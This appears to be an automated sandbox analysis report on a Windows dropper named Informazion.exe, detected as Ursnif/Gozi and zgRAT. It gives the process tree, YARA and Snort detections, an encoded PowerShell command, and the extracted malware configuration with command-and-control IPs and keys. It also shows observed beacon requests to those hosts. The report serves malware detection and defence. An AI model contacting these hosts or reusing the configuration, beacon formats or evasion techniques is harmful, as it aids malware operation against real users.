Edit tour

Windows Analysis Report
Informazion.exe

Overview

General Information

Sample Name:	Informazion.exe
Analysis ID:	782969
MD5:	ef4c4f0b7a8cd7b8bd2d2dc6e5982043
SHA1:	2374d2dc1ca7f5ebed5386114562ee677eacdb42
SHA256:	6da6fa5a959ad50302b32db9fad3862abcbd0597402941d66935203300d52821
Tags:	agenziaentrateexegoziisfbITAursnif
Infos:

Detection

Ursnif, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected zgRAT

Malicious sample detected (through community Yara rule)

Yara detected Ursnif

Antivirus detection for dropped file

Snort IDS alert for network traffic

Writes or reads registry keys via WMI

Yara detected Costura Assembly Loader

Encrypted powershell cmdline option found

Found API chain indicative of debugger detection

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Found evasive API chain (may stop execution after checking system information)

Writes registry values via WMI

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

PE file contains executable resources (Code or Archives)

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Drops PE files

Uses a known web browser user agent for HTTP communication

Found evasive API chain checking for process token information

Binary contains a suspicious time stamp

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

Informazion.exe (PID: 1248 cmdline: C:\Users\user\Desktop\Informazion.exe MD5: EF4C4F0B7A8CD7B8BD2D2DC6E5982043)

maintainabovl.exe (PID: 5976 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe MD5: B405B1565194722F9457002C4EDACBAE)

powershell.exe (PID: 5272 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA4AA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

maintainabovl.exe (PID: 5732 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe MD5: B405B1565194722F9457002C4EDACBAE)

rundll32.exe (PID: 4492 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "54nMcVbXsJKTKH8vVcgw8Yc+0pa2wr9G1H7/o7rLdJBKWNOwCDnMbXJcYNR/i7ibeIJSs3tRtxGwe2iUFKyX9YoO+lmIhr2QGinDzUBltMzooqhiU0FAsksgVKbdHApXih+yEsJjWrQ0Nzp5JxORKkch7icLGeCLd05bxwIatms+T13zzTeMAFna0q142O86LqNqYV0xf+Tp2Oo0whVb+J6hIfqd8URvw6BnxV5krG1NtSt96qfTtKKe9QJkizTNzWNfNBEuZ9jTKZZOZWrZVkcQAS+uDgm7SSO8VqkRP0eVceSUC6Y9BRbQlysqEFQ38Tzo5xZYetYnZnzD+V1Ml9UfqfxI8vecS8UO11Jnsnc=", "c2_domain": ["checklist.skype.com", "62.173.149.202", "31.41.44.158", "193.0.178.157"], "botnet": "7704", "server": "50", "serpent_key": "oLA95erEW710RFWb", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.501526804.0000000003FD4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c80:$a9: Software\AppDataLow\Software\Microsoft\
00000001.00000002.499268077.0000000002E56000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000001.00000002.499268077.0000000002D89000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000001.00000002.508878561.000000000C370000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c80:$a9: Software\AppDataLow\Software\Microsoft\
00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000001.00000002.499268077.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000001.00000002.508145509.000000000C0E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
00000001.00000002.508145509.000000000C0E0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x6ba12:$s1: file:/// 0x6b920:$s2: {11111-22222-10009-11112} 0x6b9a2:$s3: {11111-22222-50001-00000} 0x66627:$s4: get_Module 0x669ce:$s5: Reverse 0x6ab21:$s6: BlockCopy 0x6ac3e:$s7: ReadByte 0x6ba24:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
00000001.00000002.499268077.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000001.00000002.499268077.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Process Memory Space: maintainabovl.exe PID: 5976	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: maintainabovl.exe PID: 5732	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: maintainabovl.exe PID: 5732	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xd3c:$a5: filename="%.4u.%lu" 0x103a:$a5: filename="%.4u.%lu" 0x5ccc:$a5: filename="%.4u.%lu" 0x5fca:$a5: filename="%.4u.%lu" 0x804:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x5794:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x731:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xaf2:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xdf5:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x56c1:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x5a82:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x5d85:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x7975:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x799a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x7b26:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x11c0:$a9: &whoami=%s 0x6150:$a9: &whoami=%s 0x11a8:$a10: %u.%u_%u_%u_x%u 0x6138:$a10: %u.%u_%u_%u_x%u 0xcb6:$a11: size=%u&hash=0x%08x 0x5c46:$a11: size=%u&hash=0x%08x
Process Memory Space: maintainabovl.exe PID: 5732	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xc6b:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xf6c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x5bfb:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x5efc:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x804:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x9b0:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x5794:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x5940:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xd08:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x1006:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x5c98:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x5f96:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xb9c:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xea0:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x5b2c:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x5e30:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xdcc:$a9: Software\AppDataLow\Software\Microsoft\ 0x10d1:$a9: Software\AppDataLow\Software\Microsoft\ 0x1da1:$a9: Software\AppDataLow\Software\Microsoft\ 0x1dee:$a9: Software\AppDataLow\Software\Microsoft\ 0x5d5c:$a9: Software\AppDataLow\Software\Microsoft\
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.maintainabovl.exe.2deb5a8.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
1.2.maintainabovl.exe.2d6f3f8.4.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
1.2.maintainabovl.exe.2deb5a8.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
1.2.maintainabovl.exe.3fd4590.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
1.2.maintainabovl.exe.2e0cee0.3.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
1.2.maintainabovl.exe.2e03a34.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
1.2.maintainabovl.exe.3d42f70.7.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
1.2.maintainabovl.exe.3d42f70.7.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xa9c32:$s1: file:/// 0xa9b40:$s2: {11111-22222-10009-11112} 0xa9bc2:$s3: {11111-22222-50001-00000} 0xa4847:$s4: get_Module 0xa4bee:$s5: Reverse 0xa8d41:$s6: BlockCopy 0xa8e5e:$s7: ReadByte 0xa9c44:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
1.2.maintainabovl.exe.2d6f3f8.4.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
7.2.maintainabovl.exe.400000.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
1.2.maintainabovl.exe.c0e0000.9.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
1.2.maintainabovl.exe.c0e0000.9.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x6ba12:$s1: file:/// 0x6b920:$s2: {11111-22222-10009-11112} 0x6b9a2:$s3: {11111-22222-50001-00000} 0x66627:$s4: get_Module 0x669ce:$s5: Reverse 0x6ab21:$s6: BlockCopy 0x6ac3e:$s7: ReadByte 0x6ba24:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
1.2.maintainabovl.exe.c370000.10.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
7.2.maintainabovl.exe.400000.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
1.2.maintainabovl.exe.3d82f90.5.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
1.2.maintainabovl.exe.3d82f90.5.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x69c12:$s1: file:/// 0x69b20:$s2: {11111-22222-10009-11112} 0x69ba2:$s3: {11111-22222-50001-00000} 0x64827:$s4: get_Module 0x64bce:$s5: Reverse 0x68d21:$s6: BlockCopy 0x68e3e:$s7: ReadByte 0x69c24:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
1.2.maintainabovl.exe.3d82f90.5.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
1.2.maintainabovl.exe.3d82f90.5.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x6ba12:$s1: file:/// 0xeba32:$s1: file:/// 0x6b920:$s2: {11111-22222-10009-11112} 0xeb940:$s2: {11111-22222-10009-11112} 0x6b9a2:$s3: {11111-22222-50001-00000} 0xeb9c2:$s3: {11111-22222-50001-00000} 0x66627:$s4: get_Module 0xe6647:$s4: get_Module 0x669ce:$s5: Reverse 0xe69ee:$s5: Reverse 0x6ab21:$s6: BlockCopy 0xeab41:$s6: BlockCopy 0x6ac3e:$s7: ReadByte 0xeac5e:$s7: ReadByte 0x6ba24:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ... 0xeba44:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
1.2.maintainabovl.exe.2e03a34.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
1.2.maintainabovl.exe.c0e0000.9.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
1.2.maintainabovl.exe.c0e0000.9.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x69c12:$s1: file:/// 0x69b20:$s2: {11111-22222-10009-11112} 0x69ba2:$s3: {11111-22222-50001-00000} 0x64827:$s4: get_Module 0x64bce:$s5: Reverse 0x68d21:$s6: BlockCopy 0x68e3e:$s7: ReadByte 0x69c24:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
1.2.maintainabovl.exe.2e0cee0.3.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
1.2.maintainabovl.exe.3d22f50.8.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
1.2.maintainabovl.exe.3d22f50.8.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xcba52:$s1: file:/// 0x14ba72:$s1: file:/// 0xcb960:$s2: {11111-22222-10009-11112} 0x14b980:$s2: {11111-22222-10009-11112} 0xcb9e2:$s3: {11111-22222-50001-00000} 0x14ba02:$s3: {11111-22222-50001-00000} 0xc6667:$s4: get_Module 0x146687:$s4: get_Module 0xc6a0e:$s5: Reverse 0x146a2e:$s5: Reverse 0xcab61:$s6: BlockCopy 0x14ab81:$s6: BlockCopy 0xcac7e:$s7: ReadByte 0x14ac9e:$s7: ReadByte 0xcba64:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ... 0x14ba84:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
1.2.maintainabovl.exe.3d42f70.7.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
1.2.maintainabovl.exe.3d42f70.7.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xaba32:$s1: file:/// 0x12ba52:$s1: file:/// 0xab940:$s2: {11111-22222-10009-11112} 0x12b960:$s2: {11111-22222-10009-11112} 0xab9c2:$s3: {11111-22222-50001-00000} 0x12b9e2:$s3: {11111-22222-50001-00000} 0xa6647:$s4: get_Module 0x126667:$s4: get_Module 0xa69ee:$s5: Reverse 0x126a0e:$s5: Reverse 0xaab41:$s6: BlockCopy 0x12ab61:$s6: BlockCopy 0xaac5e:$s7: ReadByte 0x12ac7e:$s7: ReadByte 0xaba44:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ... 0x12ba64:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
Click to see the 21 entries

Snort Signatures

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) - Source IP: 192.168.2.4 - Destination IP: 62.173.149.202

Timestamp:	192.168.2.462.173.149.20249696802033204 01/12/23-12:14:18.009455
SID:	2033204
Source Port:	49696
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) - Source IP: 192.168.2.4 - Destination IP: 62.173.149.202

Timestamp:	192.168.2.462.173.149.20249696802033203 01/12/23-12:14:18.009455
SID:	2033203
Source Port:	49696
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) - Source IP: 192.168.2.4 - Destination IP: 31.41.44.158

Timestamp:	192.168.2.431.41.44.15849697802033203 01/12/23-12:14:38.185535
SID:	2033203
Source Port:	49697
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) - Source IP: 192.168.2.4 - Destination IP: 31.41.44.158

Timestamp:	192.168.2.431.41.44.15849697802033204 01/12/23-12:14:38.185535
SID:	2033204
Source Port:	49697
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) - Source IP: 192.168.2.4 - Destination IP: 193.0.178.157

Timestamp:	192.168.2.4193.0.178.15749698802033203 01/12/23-12:14:58.327920
SID:	2033203
Source Port:	49698
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Informazion.exe

Virustotal: Detection: 14%

Perma Link

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

Avira: detection malicious, Label: TR/Crypt.OPACK.Gen

Source: 1.2.maintainabovl.exe.2deb5a8.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.maintainabovl.exe.2e0cee0.3.unpack	Avira: Label: TR/Patched.Ren.Gen4
Source: 1.2.maintainabovl.exe.2d6f3f8.4.unpack	Avira: Label: TR/Patched.Ren.Gen4
Source: 7.2.maintainabovl.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 1.2.maintainabovl.exe.2e03a34.0.unpack	Avira: Label: TR/Patched.Ren.Gen4

Source: 00000001.00000002.499268077.0000000002D89000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Ursnif {"RSA Public Key": "54nMcVbXsJKTKH8vVcgw8Yc+0pa2wr9G1H7/o7rLdJBKWNOwCDnMbXJcYNR/i7ibeIJSs3tRtxGwe2iUFKyX9YoO+lmIhr2QGinDzUBltMzooqhiU0FAsksgVKbdHApXih+yEsJjWrQ0Nzp5JxORKkch7icLGeCLd05bxwIatms+T13zzTeMAFna0q142O86LqNqYV0xf+Tp2Oo0whVb+J6hIfqd8URvw6BnxV5krG1NtSt96qfTtKKe9QJkizTNzWNfNBEuZ9jTKZZOZWrZVkcQAS+uDgm7SSO8VqkRP0eVceSUC6Y9BRbQlysqEFQ38Tzo5xZYetYnZnzD+V1Ml9UfqfxI8vecS8UO11Jnsnc=", "c2_domain": ["checklist.skype.com", "62.173.149.202", "31.41.44.158", "193.0.178.157"], "botnet": "7704", "server": "50", "serpent_key": "oLA95erEW710RFWb", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Source: C:\Users\user\Desktop\Informazion.exe	Code function: 0_2_00007FF64C5130EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,		0_2_00007FF64C5130EC
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Code function: 7_2_010952F6 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		7_2_010952F6

Source: unknown

HTTPS traffic detected: 174.142.60.54:443 -> 192.168.2.4:49695 version: TLS 1.2

Source: Informazion.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: wextract.pdb source: Informazion.exe
Source:	Binary string: wextract.pdbGCTL source: Informazion.exe
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Informazion.exe

Code function: 0_2_00007FF64C51204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

0_2_00007FF64C51204C

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49696 -> 62.173.149.202:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49696 -> 62.173.149.202:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49697 -> 31.41.44.158:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49697 -> 31.41.44.158:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49698 -> 193.0.178.157:80

Source: Joe Sandbox View

ASN Name: MGNHOST-ASRU MGNHOST-ASRU

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic

HTTP traffic detected: GET /wp-admin/images/css/ground/bo/Zujiies.png HTTP/1.1Host: christianbeltran.coConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: GET /drew/jHChKd_2FjBQ0IhBZb/5eUb4wlnJ/nNAqLlhkhlVL_2BEMNaO/fU1yD2cllcbT9iHTfpI/6H3bbK1eyqLaqlIY2TE5OB/0EJzuQaexEZcX/7fNH93_2/BPaD_2BE_2FjENdy4RFw7Ax/5wIB2h5UN_/2FRQ47MCK2MIF7ewb/8_2Fu3XthbQR/CPx2qHatKTD/YHT_2FrDgK83SJ/t3nFbWzQ9PsSm_2Fb3E2u/XDf1ma0rrcvNnpl1/ThfvvL6MGjuAWJC/PiXEIoZrVwPJmdlxug/dGZn9wbLf/wg1whEjmB/85umsLkj4az/T.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 62.173.149.202Connection: Keep-AliveCache-Control: no-cache
